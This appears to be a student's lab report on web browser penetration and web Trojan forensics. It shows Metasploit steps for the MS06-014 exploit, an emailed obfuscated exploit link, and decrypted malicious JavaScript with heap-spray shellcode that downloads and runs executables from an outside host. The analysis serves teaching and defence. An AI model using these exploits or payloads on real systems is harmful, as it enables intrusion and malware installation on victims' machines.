20212914 the 11th (13th week) operation of network attack and defense practice (2021-2022-2)

1. practice content

1.1 practice introduction

(1) web browser penetration attack

Task: conduct browser penetration attack experiment with attacker and Windows target, and experience the actual process of constructing web Trojan horse and implementing browser attack.

Experiment steps:

①Select use Metasploit Medium MS06-014 Penetration attack module

②choice PAYLOAD For any remote Shell connect

③Set server address and URL Parameters, running exploit,Construct malicious web Trojan script

④Start the browser in the target environment, verify the connectivity with the server, and access the web Trojan script URL

⑤On the Metasploit Check the penetration attack status in the software, and set up the remote control session after the successful penetration attack SESSION,Remote command execution on target aircraft

(2) Forensics analysis practice - Analysis of web Trojan attack scenarios

Practice process:

① First you should visit start HTML. In this file, new09 Htm address,

② After entering htm, for each decrypted file address, please make 32-bit MD5 hash for it, and take the hash value as the file name to Download the corresponding file from the hash value (Note: the English letters in the file name are in lowercase and have no extension), that is, the file corresponding to the decrypted address.

③ If the decrypted address is a web page or script file, please continue to decrypt.

④ If the decrypted address is a binary program file, please perform static disassembly or dynamic debugging.

⑤ Repeat the above process until all these documents are analyzed.

(3) Attack and defense confrontation practice - attack and defense of web browser penetration attack

The attacker uses Metasploit to construct penetration attack codes of at least two different Web browser software security vulnerabilities, and then assembles them into a URL after confusion, which is sent to the defender through deceptive e-mail.

The defender extracts and disambiguates the links in the email, tries to recover the original form of the penetration code, and analyzes which Web browser software security vulnerabilities these penetration codes attack.

1.2 learning content

web penetration

information gathering

First, collect the server asset information to understand which IPS are alive, which ports are open to the surviving IPS, and the services corresponding to the ports.

Weak password detection

Among the open port services of these servers, the main services are system services, database services and web services. It is very necessary to detect weak passwords for common port services.

Web application penetration

Through server asset detection, the open web ports of the server can be collected. In the intranet system, most of the interfaces accessed by the web system are login interfaces, which require user name and password authentication. Taking an intranet system as an example, the actual penetration test is carried out.

System vulnerability detection

When you enter the intranet, you can usually solve some servers through weak passwords and the web. If you can't, you can try the system vulnerability. When there are few intranet patches, you can try the remote overflow (use with caution, which may cause the system blue screen downtime).

Trojan horse attack

Working principle of Trojan horse

The Trojan horse program can directly invade the user's computer and destroy it. It is often disguised as a tool program or a game to entice the user to open the email attachment with the Trojan horse program or download it directly from the Internet. Once the user opens the attachment of these emails or executes these programs, they will hide a program in the computer system that can be silently executed at startup. This remote control tool can completely control the victim host, which is very harmful.

Trojan generally includes two parts: client and server.
The server is installed in the controlled computer. It generally allows users to run in their computer through e-mail or other means to achieve the purpose of controlling the user's computer.
The client program is used by the controller to control the controlled computer.
The connection between the server program and the client program can realize the control of the remote computer.
When the Trojan horse is running, the server-side program first obtains the highest operation authority of the local computer. When the local computer is connected to the network, the client program can directly establish a connection with the server-side program, send various basic operation requests to the server-side program, and the server-side program completes these requests, thus realizing the control of the local computer.

Because the Trojan horse must require both the server-side program and the client-side program to work, it must require the local machine to infect the server-side program. The server-side program is an executable program, which can spread directly or implicitly in other executable programs, but the Trojan horse itself does not have the function of reproduction and automatic infection.

Classification of Trojans

1. remote access Trojan horse
2. password sending Trojan horse
3. keyboard recording Trojan horse
4. destructive Trojan horse
5.FTP type Trojan horse

2. practice process

2.1 web browser penetration attack

Attacker ip:
Target ip:
There is no problem in testing the connectivity between the attacker and the target.

Open Metasploit on Kali using sudo msfconsole:

search MS06-014 search for MS06-014 vulnerabilities and use use exploit/windows/browser/ie_createobject:

set payload windows/shell/bind_tcp loads the payload used, view other settings in show options, and then expand to generate
The target uses a browser to access the URL:

At this point, the attacker will get a session, enter sessions -i 1, select session 1, and return to the shell:

2.2 forensics analysis practice - Analysis of web Trojan attack scenarios

First, we can start at start HTML file (copy it to Notepad and open it). Search "new09.htm" and you can find two places:

From these two points, we can see that start The HTML file is referencing new09 Htm file, so new09 Htm file and start The HTML file is in the same directory. Check new09 Htm:

<iframe width='0' height='0' src='http://aa.18dd.net/aa/kl.htm'></iframe> 
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1299644.js"></script> 

You can see new09 Htm file, a http://aa.18dd.net/aa/kl.htm File, another javascript reference http://js.users.51.la/1299644.js Documents. MD5 hash them respectively:

Then go to the hashed folder to find these two files, 7f60672dcd6b5e90b6772545ee219bd3 and
23180a42a2ff1192150231b44ffdf3d3 d3, open them with Notepad respectively:

Obviously, there is no information in the latter file. The content in the former file uses the XXTEA+Base64 encryption method. You can see that the encryption key is hidden in the penultimate line:

t=utf8to16(xxtea_decrypt(base64decode(t), '\x73\x63\x72\x69\x70\x74'));
The key script can be obtained by converting \x73\x63\x72\x69\x70\x74 to hexadecimal string:

Use this website for XXTEA+Base64 decryption:

Then, convert the hexadecimal number in quotation marks to a string, and you can get the following:

function init(){document.write();}
window.onload = init;
try{var e;
var ado=(document.createElement("object"));
var as=ado.createobject("Adodb.Stream","")}
var expires=new Date();
if(e!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
try{var f;var storm=new ActiveXObject("MPS.StormPlayer");}
finally{if(f!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
finally{if(g!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}
try{var h;var obj=new ActiveXObject("BaiduBar.Tool");}
finally{if(h!="[object Error]"){
obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}

You can see that the application vulnerabilities exploited by this file include "Adodb.Stream", "MPS.StormPlayer", and powerplayer Powerplayerctrl 1 "and" Baidu bar.tool "respectively exploit the vulnerabilities of Microsoft database access object, storm video, PPStream and Baidu soba. These are the software that network users use very frequently. In addition, this file also refers to three js files and a compressed package (bd.cab, bd.exe after unpacking). After that, calculate separately“ http://aa.18dd.net/aa/1.js ”“ http://aa.18dd.net/aa/b.js ”“ http://aa.18dd.net/aa/pps.js ”And“ http://down.18dd.net/bb/bd.cab ”The md5 value of:

file MD5 value
http://aa.18dd.net/aa/1.js 5d7e9058a857aa2abee820d5473c5fa4
http://aa.18dd.net/aa/b.js 3870c28cc279d457746b3796a262f166
http://aa.18dd.net/aa/pps.js 5f0b8bf0385314dbe0e5ec95e6abedc2
http://down.18dd.net/bb/bd.cab 1c1d7b3539a617517c49eee4120783b2

Open the corresponding files in sequence:

1,http://aa.18dd.net/aa/1.js (5d7e9058a857aa2abee820d5473c5fa4)

After opening the corresponding file, you can find that it is hexadecimal data:

After conversion, you can get:

var url="http://down.18dd.net/bb/014.exe";try{var xml=ado.CreateObject("Microsoft.XMLHTTP","");xml.Open


();var shell=ado.createobject("Shell.Application","");shell.ShellExecute("cmd.exe","/c "+path,"","open",0)}catch(e){}

The previous section of the code downloaded a http://down.18dd.net/bb/014.exe The latter part is the continued use of ADODB vulnerabilities.

2,http://aa.18dd.net/aa/b.js (3870c28cc279d457746b3796a262f166 )

The packed encryption method is used here, which can be decrypted on the website. The decryption result is:

var bigblock=unescape("%u9090%u9090");
var headersize=20;
var shellcode=unescape("%uf3e9%u0000"+"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c"+"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378"+"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b"+"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef"+"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1"+"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103"+"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904"+"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b"+"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e"+"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d"+"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320"+"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344"+"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc"+"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0"+"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab"+"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f"+"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574"+"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e"+"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00"+"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c"+"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54"+"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");
var slackspace=headersize+shellcode.length;
memory=new Array();
var buffer='';

We can see the keyword shellcode. According to the reference file, shellcode is a downloader, so we need to find the URL. The final result is http://down.18dd.net/bb/bf.exe Get an executable file.

3,http://aa.18dd.net/aa/pps.js (5f0b8bf0385314dbe0e5ec95e6abedc2 )

Octal encryption is adopted here, and the decryption result is:

/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="\x0a\x0a\x0a\x0a";
pps.Logo = buffer

Like the previous decryption method, you can get the executable file http://down.18dd.net/bb/pps.exe

4,http://down.18dd.net/bb/bd.cab (1c1d7b3539a617517c49eee4120783b2 )

This is a compressed file. Decompress it to get a file called bd.exe.

Using the super patrol tool, check the shelling of the executable file and find that it is written in Delphi:

Disassemble BF with W32Dasm software Exe file, and view the list of string reference contents:

From the above, we can infer as follows:
It can be inferred from "goto try", "try", "Alletdel.bat", "cmd /c date", "cmd /c date 1981-01-12", "del", "del%0" and other strings that this program may generate a batch file called "Alletdel.bat". This file has a label called "try". The batch file will continuously execute the command on the next line of this label. The content of the command may be to judge the existence of the file, change the system date, and delete some files.

From ": \AutoRun.inf," [AutoRun] open= "," AutoRun.inf "and" shell\Auto\command= ", it is speculated that the program may generate automatic running files in the root directory of the disk, so that the user can start the program accidentally.

"Rising Kaka Internet Security Assistant - IE leak proof wall", "allow" and "allow to execute" show that this program has certain ability to prevent system protection software.

You can see 20“ http://down.18dd.net/kl/**.exe ", this program needs to download a bunch of Trojans.

2.3 attack and defense confrontation practice - attack and defense of web browser penetration attack

The attacker uses Metasploit to construct penetration attack codes of at least two different Web browser software security vulnerabilities, and then assembles them into a URL after confusion, which is sent to the defender through deceptive e-mail.

The defender extracts and disambiguates the links in the email, tries to recover the original form of the penetration code, and analyzes which Web browser software security vulnerabilities these penetration codes attack.


Follow the steps of the first experiment to generate a URL using MS06-014 vulnerability,

Then disguise the URL as an email and send it to the defender:


After receiving this email, the defender opens its source code and can see that a large number of spaces, horizontal tabs, carriage returns, etc. are used in the middle. In this way, string splicing can be done for key instructions to prevent them from being discovered by anti-virus software:

Use the website to get the complete code as follows. After reading the code, you can see that document The location loads the payload, and an executable file is followed in the next line. I guess this executable file should be downloaded to the target machine through the web page using the attacker as the server:

Open the target task manager to view the running process. You can find the executable file that appears:

3. problems encountered in learning and Solutions

  • Question 1: the attack in Experiment 1 was unsuccessful
  • Solution to problem 1: replace the payload:paylaodwindows/shell/bind_tcp, the attack can succeed.

4. practice summary

In this experiment, I learned how to carry out web browser penetration attacks, how to analyze and collect evidence for web Trojans, and another skill of using metasploit.

Posted by wellmoon on Mon, 30 May 2022 10:29:51 +0530